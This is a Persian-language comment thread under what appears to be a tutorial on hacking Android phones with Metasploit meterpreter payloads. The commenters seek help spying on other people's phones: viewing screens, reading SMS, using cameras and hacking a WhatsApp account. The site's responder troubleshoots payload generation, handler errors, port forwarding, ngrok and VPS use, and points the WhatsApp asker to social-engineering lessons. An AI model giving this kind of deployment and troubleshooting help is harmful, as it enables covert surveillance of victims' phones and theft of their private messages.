اما قبلش یه بار تست میکنم روی گوشی خودم ببینم که اصلا سالم هست رات و دسترسی میده و این سوال اصلی اینه وقتی رات نصب شه روی تارگت اگر من از ترمینالم خارج نشده باشم بزنم exploit نشون میده که دسترسی دارم ایا و این که من میخوام صفحه گوشیشتو ببینم خوب مشکلم اینکه دقیق نمیدونم چه دستوری لازمه میشه یکم راهنمایی کنید ؟

    • نیما حسینی تیر ۲۵, ۱۳۹۹ پاسخ

      درود و تشکر
      داخل سرورتون از پورت ۲۲ استفاده نکنید احتمالا از طریق ssh متصل شده اید و پورت ۲۲ برای سرویس ssh است و اشغال است پورت دیگری را انتخاب کنید.
      ای پی پابلیک سرور شما همان ای پی است که از طریق ان متصل شده اید.
      نوع اتصال اینترنت شما به سرور ربطی ندارد.
      در صورتی که از ترمینال هم خارج شوید می توانید مجدد هم متصل شوید.
      ابزار هایی که در خصوص بایند با عکس هستند اکثرا فیک هستند و برای الوده کردن سیستم شما هستند و توصیه نمی کنیم استفاده کنید.
      برای استفاده از دسترسی هایی که دارید از دستوراتی که گفته شده است استفاده کنید.

  • Ali تیر ۱۷, ۱۳۹۹ پاسخ

    سلام ممنون از اموزش خوبتون…
    من یک مشکل دارم اونم اینه که وقتی دسترسی meterpreter میگیرم ولی وقتی وبکم استریم رو میزنم ارور میده میگه باید جاوا اسکریپت رو روی مرورگر فعال کنی درحالی که جاوا اسکریپت روی مرورگر اکسپلورر من فعاله لطفا کمک کنید

    • نیما حسینی تیر ۲۵, ۱۳۹۹ پاسخ

      درود بر شما تشکر
      از مرورگر های دیگر مانند کروم استفاده کنید ، دقت داشته باشید دسترسی به دوربین در دستگاه کلاینت به برنامه داده شده باشد. اگر باز هم مشکلی داشتید متن ارور را ارسال کنید.

  • abolfazl.mohammadi تیر ۲۱, ۱۳۹۹ پاسخ

    برای تنظیم پورت می توانیم پورت ۸۰۸۰ انتخاب کنیم؟
    درباره آیپی و پورت میشه بیشتر توضیح بدید؟

    • نیما حسینی تیر ۲۵, ۱۳۹۹ پاسخ

      درود
      بله می توانید از پورت ۸۰۸۰ هم استفاده کنید.
      برای اشنایی با پورت و ای پی اموزش های شبکه را در پن تست کور جستجو و مشاهده کنید.
      پورت های شبکه از ۱-۶۵۵۳۵ هستند.
      اما باید با ای پی های استاتیک و داینامیک حتما اشنا شوید و جستجو انجام دهید چرا که این موضوع گسترده است.

  • mmch تیر ۳۰, ۱۳۹۹ پاسخ

    سلام میشه دستورات بعد از گرفتن دسترسی در متاسپلویت برای ریختن فایل به گوشی یا ریختن فایل های گوشی به داخل کامپیوتر رو هم یاد بدید یا مثلا پیامکاشو چطوری باید بخونیم یا چطوری دسترسی به دوربینش داشته باشیم

    • نیما حسینی مرداد ۱۰, ۱۳۹۹ پاسخ

      درود
      مواردی که فرمودید اموزش داده شده کل متن اموزش را مطالعه کنید.

  • امیر محمد عد مرداد ۲, ۱۳۹۹ پاسخ

    سلام نرم افزار عالیه من ازش استفاده کردم مخصوصا پیامکش
    ۵ ستاره هم کمه

    • نیما حسینی مرداد ۱۰, ۱۳۹۹ پاسخ

      درود
      خوشحالیم که این آموزش برای شما کاربردی بوده
      موفق و پیروز باشید.

  • محمد مرداد ۶, ۱۳۹۹ پاسخ

    درود .خسته نباشید. من به گوشی طرف مقابل دسترسی ندارم و اینکه نمیتونم واسش برنامه بفرستم اگه بفرستم مطمئنم اجراش نمیکنه.راه دیگه ای سراغ ندارین .من فقط واتساپش رو میخام هک کنم. ممنون میشم جواب بدین

    • نیما حسینی مرداد ۱۰, ۱۳۹۹ پاسخ

      درود
      پیشنهاد می کنم آموزش مربوط با روش‌های مهندسی اجتماعی را مشاهده کنید که در حل مشکل شما کمک خواهد کرد.

  • Alich مرداد ۱۳, ۱۳۹۹ پاسخ

    سلام وقتتون بخیر ببخشید یه سوال داشتم
    من همه مراحل به خوبی اجرا میکنم اما وقتی تارگت پیلود نصب میکنه متاسپلویت دسترسی مترپتر بهم نمیده و فقط سیشن باز میکنه با دسترسی خیلی خیلی محدود. همیشه هم این مشکل پیش نمیاد (بگیر نگیر داره) علتش چیه و چه طور این مشکل حل کنم ممنون

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود
      در نسخه های جدید اندروید شما بعد از نصب برنامه در دستگاه باید به تک تک به بخش‌های مختلف دسترسی بدهید؛ اگر دسترسی ها محدود شده باشد با این مشکل مواجه می شوید و باید حتماً دسترسی های لازمه را به برنامه بدهید تا دسترسی کامل داشته باشید.

  • سعید سرآبادانی مرداد ۱۶, ۱۳۹۹ پاسخ

    سلام و عرض ادب . من قبلا با این متد کار میکردم اما به یک صورت دیگه . میخواستم بدونم ایا این متد یا ترفند شما !
    اندروید بالای ورژن ۱۰ را پشتیبانی میکنه ؟
    چون متد من فقط برای ورژن اندروید زیر ۱۰ یعنی ۹ و ۸ . ۶ و…
    در اندروید ۱۰ هنگامی که فایل خروجی و بر روی گوشی نصب میکنیم . یک پیامی میده
    که این برنامه قدیمی میباشد و به طراح و خلق کننده این برنامه پیام بدهید .
    میشه لطفاً راهنمایی کنید !
    چون این ارور رفع نشه به شما هیچ اجازه دسترسی به ترموکس را نخواهد داد

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود
      بر روی اندروید ۱۰ هم این روش جواب می دهد اما باز هم برای اطمینان این مورد را تست خواهیم کرد و اگر مشکلی وجود داشت و روش جدیدتری آموزش خواهیم داد.

  • سعید سرآبادانی مرداد ۱۶, ۱۳۹۹ پاسخ

    سلام مجدد اون پیامی که گفتم در اندروید ۱۰ ذکر شده اینه !

    This App Was Bilt for and Older Version of Android and May Not Work Properly . Try Checking For Updates or Contact the Developer.

    اگه این خطا در ایندروید ۱۰ رفع نشه امکان دسترسی وجود نداره!
    میشه راهنمایی کنید!
    چون من با Msfvenom -p Android/MeterPreter … اندروید ۹ و ۸ و ۶ وراحت می شد هک کرد اما اندروید نسخه ۱۰ نمیشه!

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود
      فکر نمی‌کنم که این مشکل روی همه دستگاه ها باشد اما حتماً بررسی می‌کنیم اگر روی همه دستگاه‌های مشکل وجود داشت آموزش جدید در این رابطه قرار خواهیم داد.

  • maxoor مرداد ۲۰, ۱۳۹۹ پاسخ

    درود با تشکر از سایت خوبتون
    من تمامی مراحل انجام دادم و از سرور مجازی هم استفاده میکنم بعد از exploit این ارور رو میده :
    handler failed to bind to ***..***.***.***:6666
    مشکل از کجاست ؟

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود بر شما
      این مشکل ممکن است دلایل مختلفی داشته باشد و یکی از این دلایل استفاده از برنامه‌های امنیتی در اندروید باشد که توانسته باشد تشخیص دهند یک برنامه کانکشن نا امن برقرار کرده و دسترسی شما قطع می‌شود یا خود برنامه دسترسی محدودی دارد که این مشکل پیش آمده است.

  • پوریا مرداد ۲۱, ۱۳۹۹ پاسخ

    سلام اقا نیما چرا اکثر اموزشایی که دیدم از دستور msfvenom استفاده میکنن ولی شما اینکارو نکردید چه تفاوتی داره؟؟

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود
      دستورات تفاوتی ندارند اما ما از روش جدیدتر استفاده می‌کنیم و این روش مفهومی تر هم هست و می توانید با درک بهتری از روش آموزش داده شده استفاده کنید.

  • ALFA مرداد ۲۲, ۱۳۹۹ پاسخ

    سلام مهندس یه سوال؟
    Metasploit روی اندروید چند جواب میده؟
    اخه موقعی که سیشن گرفته میشه METERPRETER SESSION 1 CLOSED REASON=DIED
    مشکل از چی روشی هست فیکسش کنم؟
    بعد دسترسی هم که من میگیرم محدوده مثلا کلا دسترسی shell نمیگیرم.
    ممنون میشم یه راهنمایی بنده رو بکنید.

    • نیما حسینی مرداد ۲۶, ۱۳۹۹ پاسخ

      درود
      متاسپلویت پیلود های مختلفی دارد که هر کدام روی نسخه های مختلفی هم کار می کنند.
      روش اتصال را تغیر بدین برای مثال اگر از NOIP استفاده می کنید از NGROK استفاده نمایید یا اتصال مستقیم بزنید.
      یکبار هم از شبکه داخلی تست کنید.
      مشکل بعدیتون هم حتمالا دسترسی محدود داشتن اپلیکیشن در دستگاه شماست.

  • Sajaf مرداد ۲۸, ۱۳۹۹ پاسخ

    سلام ، کسایی که ویندوز کار میکنن تکلیفشون چی میشه؟ چطوری هک کنن؟

    • نیما حسینی مرداد ۳۱, ۱۳۹۹ پاسخ

      درود
      می توانید از نسخه ویندوزی متاسپلویت استفاده کنید یا کالی را در ماشین مجازی در کنار ویندوز داشته باشید.

  • 1985_َAMiR_HACKER شهریور ۱۱, ۱۳۹۹ پاسخ

    سلام و خسته نباشید خدمت شما
    تشکر میکنم بابت آموزش خوبتون
    ببخشید من وقتی میخوام به خارج از شبکه دسترسی بگیرم، یه وقت‌هایی روی برنامه که میزنم راحت سشن برام باز میشه، ولی اکثر مواقع حداقل باید دو سه بار روی برنامه بزنم تا دسترسی بگیرم، اون سشن‌هایی هم که برام باز میشه دسترسی فول نمیده، رو شبکه لوکال خیلی راحت جواب میده روی ورژن ۸.۱ اندروید خیلی خوب جواب داده، ولی وقتی خارج از شبکه اینکارو میکنم حتی رو ورژن ۶ هم تست کردم دسترسی‌هام همین مشکلی هست که عرض کردم، درضمن با ابزار ngrok من پورت فوراردینگ انجام میدم، میخوام ببینم مشکل از پورت فورواردینگه؟؟؟ یا پیلود مشکل داره؟

    • نیما حسینی شهریور ۱۴, ۱۳۹۹ پاسخ

      درود بر شما و تشکر از دیدگاه خوب شما
      برای حل این مشکل اینکار را داخل سرور مجازی انجام بدین یا از سرویس های دیگری جز ngrok استفاده کنید.

  • ali شهریور ۲۱, ۱۳۹۹ پاسخ

    ببخشید میشه آموزش کامل کالی لینوکس
    برای کسایی که هیچی از هک نمیدونن بزارید

    • نیما حسینی شهریور ۲۱, ۱۳۹۹ پاسخ

      درود
      دوره اموزش کالی لینوکس موجود است که اموزش کامل در ان قرار دارد.
      پیشنیاز هم ندارد می توانید از این دذوره استفاده کنید.

  • ail شهریور ۲۴, ۱۳۹۹ پاسخ

    ممنون از اموزش فقط دو تا سوال داشتم من بلد نیستم کالی به نت وصل کنم مشکلی ندارع سوال بعد از ای پی بدی میتونن پیدات کنن

    • نیما حسینی شهریور ۳۰, ۱۳۹۹ پاسخ

      درود
      بستگی دارد از کالی لینوکس در مجازی ساز استفاده می کنید یا نصب کرده اید اگر از مجازی ساز استفاده میکنید از داخل تنظیمات network مجازی ساز باید اتصال اینترنت را برقرار کنید که به صورت اتوماتیک اصولا وصل می شود زمانی که سیستم اصلی شما به اینترنت دسترسی دارد. سوال دوم شما هم بله.

  • alyanm100 شهریور ۲۷, ۱۳۹۹ پاسخ

    سلام ببخشید فایل بکدور که گفتین انتهای اموزش هست کجاست میشه بگین از کجا تهیه کنم

    • نیما حسینی مهر ۴, ۱۳۹۹ پاسخ

      درود مرسی از اطلاع شما لینک را در آموزش قرار خواهیم داد.

  • امین شهریور ۳۱, ۱۳۹۹ پاسخ

    سلام
    برای بخش ای پی پورت باید سرور خریده باشم و ای پی پورت اونو بزنم؟

    • نیما حسینی مهر ۴, ۱۳۹۹ پاسخ

      درود
      بله می توانید از سرور استفاده کنید یا از سرویس هایی مانند ngrok استفاده کنید که داخل سایت اموزش ان موجود است و می توانید از بخش جستجو ان را سرچ و مشاهده کنید.

  • cyber attacker مهر ۵, ۱۳۹۹ پاسخ

    درود و خسته نباسید
    ببخشید برای سرور مجازی از کجا سرور بخرم که سیستم عامل لینوکس داشته باشه برای حملات وارز باشد ؟؟
    با تشکر

    • نیما حسینی مهر ۵, ۱۳۹۹ پاسخ

      درود بر شما تشکر
      شما می توانید به وب سایت اول سرور از لینک زیر مراجعه کنید:
      avalserver.com

  • cyber attacker مهر ۵, ۱۳۹۹ پاسخ

    با سلام دوباره
    بنده سرور لینوکسی خریداری کردم ولی وقتی ip و port را می زنم وصل نمی شه و برنامه ساخته نمی شه . می شه کمکم کنید ؟؟

    • نیما حسینی مهر ۱۱, ۱۳۹۹ پاسخ

      درود
      آموزش را کامل مشاهده کنید و باید از دستور generate برای ساخت فایل استفاده کنید و در صورتی که باز هم مشکل داشتید باید اروری که دریافت می کنید را ارسال کنید تا ما بتوانیم به شما کمک کنیم.

  • میثم مهر ۵, ۱۳۹۹ پاسخ

    سلام دستور meterpeter رو میزنم ارور میده و ساخته نمیشه

    • نیما حسینی مهر ۱۱, ۱۳۹۹ پاسخ

      درود
      اروری که دریافت میکنید را ارسال کنید.

  • Cyber attacker مهر ۶, ۱۳۹۹ پاسخ

    با سلام و خسته نباشید
    ببخشید بنده الان سرور خریداری کردم و آدرس آیپی و پورت سرور رو می زنم ولی نمی دونم چرا ارور می ده و متصل نمی شه ؟؟

    • نیما حسینی مهر ۶, ۱۳۹۹ پاسخ

      درود و تشکر
      چه اروری دریافت می کنید متن ارور را ارسال کنید.

  • Cyber attacker مهر ۶, ۱۳۹۹ پاسخ

    با سلام
    Exploit compiled but no session was created
    و اینکه بنده آیپی و پورت را دقیق وارد کردم

    • نیما حسینی مهر ۱۱, ۱۳۹۹ پاسخ

      درود
      بعد از ست کردن پیلود مجدد LHOST و LPORT تنظیم کنید.

  • Amin10010 مهر ۶, ۱۳۹۹ پاسخ

    چرا وقتی exploit رو میزنم اینو unknown command:exploit. میگه؟

    • نیما حسینی مهر ۱۱, ۱۳۹۹ پاسخ

      درود
      احتمالا وارد multi/handler و پیلود مورد نظر نشدید که این مشکل را دارید طبق اموزش به ترتیب پیش بروید.

  • deadpool254 مهر ۷, ۱۳۹۹ پاسخ

    سلام و درود مرسی از اموزش خوبتان
    فقط وقتی که من PAYLOAD رو میزنم میگه is not valid میشه راهنمایی کنید؟

    • نیما حسینی مهر ۱۱, ۱۳۹۹ پاسخ

      درود بر شما خواهش میکنم
      این ارور به دلیل اشتباه نوشته شدن دستور است که باید دقت کنید دستور مورد نظر را به درستی و کامل وارد کرده‌اید و حروف کوچک و بزرگ را رعایت کنید.

  • علی مهر ۱۰, ۱۳۹۹ پاسخ

    سلام میشه از این پیلود در خارج شبکه هم استفاده کنیم ؟؟ باید چکار کنیم خارج از شبکه هم جواب بده ؟؟

  • Ali مهر ۱۱, ۱۳۹۹ پاسخ

    سلام ببخشید مشکلی نداره داخل سرور مجازی ویندوز وی ام ور یا مجازی ساز نصب کنیم و کالی را داخل مجازی ساز نصب کنیم و تست نفوذ انجام بدیم
    ایا مشکلی پیش میاد ؟

    • نیما حسینی مهر ۱۱, ۱۳۹۹ پاسخ

      درود
      داخل سرور مجازی به دلیل اینکه خود سرور به صورت مجازی سازی شده است نمی توانید مجازی ساز نصب کنید.

  • mahanturbo مهر ۱۴, ۱۳۹۹ پاسخ

    سلام خسته نباشید من metasploit رو روی ویندوز نصب کردم و اجراش کردم و دارم مراحل رو پیش میرم سوال اینجاست که این اشتباهه و باید روی کالی نصب کنم ؟ و برای ایپی و پورت سرور مجازی از کجا خریداری کنم ؟ و چجوری از سرور مجازی استفاده کنم ؟

    • نیما حسینی مهر ۱۶, ۱۳۹۹ پاسخ

      درود
      روی ویندوز مشکلی ندارد، برای تهیه سرور مجازی به وب سایت اول سرور مراجعه کنیدو بعد از تهیه در قسمت LHOST ایپی سرور مجازی را وارد کنید.

  • mahanturbo مهر ۱۵, ۱۳۹۹ پاسخ

    سلام خسته نباشید من هرچی میگردم فایلو تو سیستمم پیدا نمیکنم که رو موبایل نصب کنم شاید بخاطر این ارور هست Error while running command generate: Permission denied – Mahan.apk

    • نیما حسینی مهر ۱۶, ۱۳۹۹ پاسخ

      درود و تشکر
      با یوزر روت انجام بدین یا مسیر فایل خروجی را به دستکاپ خود بدهید.

  • Abolfalz مهر ۲۳, ۱۳۹۹ پاسخ

    سلام من بعد از زدن exploit یه تیکه خط کد میاد و دیگه اون تیکه کد ادامه داده نمیشه

    • نیما حسینی مهر ۳۰, ۱۳۹۹ پاسخ

      درود
      شما تا متنی که دریافت می کنید را ارسال نکنید نمی توانیم شما را راهنمایی کنیم.

  • M.J1385 مهر ۲۹, ۱۳۹۹ پاسخ

    سلام استاد
    من برای ساخت فایل ip و port که در no ip ساختم میزنم و پورتی که در پورت فورواردینگ زدم میزنم
    وارد سایتی که در آموزش no ip گفتید چک میکنم اتصال هست .ولی ایپی رو ک ست میکنم run ک میزنم برنامه رو اجرا میکنم اتصال بر قرار نمیشه .با ngrok امتحان کردم شد ولی بدیش اینه ک هر سری ۱ ایپی میده و باید یک بار دیگه فایل ساخت ارسال کرد
    no ip رو چطور درست کنم
    ممنون از سایت خوبتون

    • نیما حسینی آبان ۲, ۱۳۹۹ پاسخ

      درود
      احتمالا مشکل در پورت فورواردینگ دارید تنظیمات ان را بررسی کنید.
      پیشنهاد می کنیم داخل سرور مجازی استفاده کنید که این مشکلات را نداشته باشید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

قوانین پن تست کور
کالی لینوکس
دوره های آموزشی
نماد اعتماد
همکاری با ما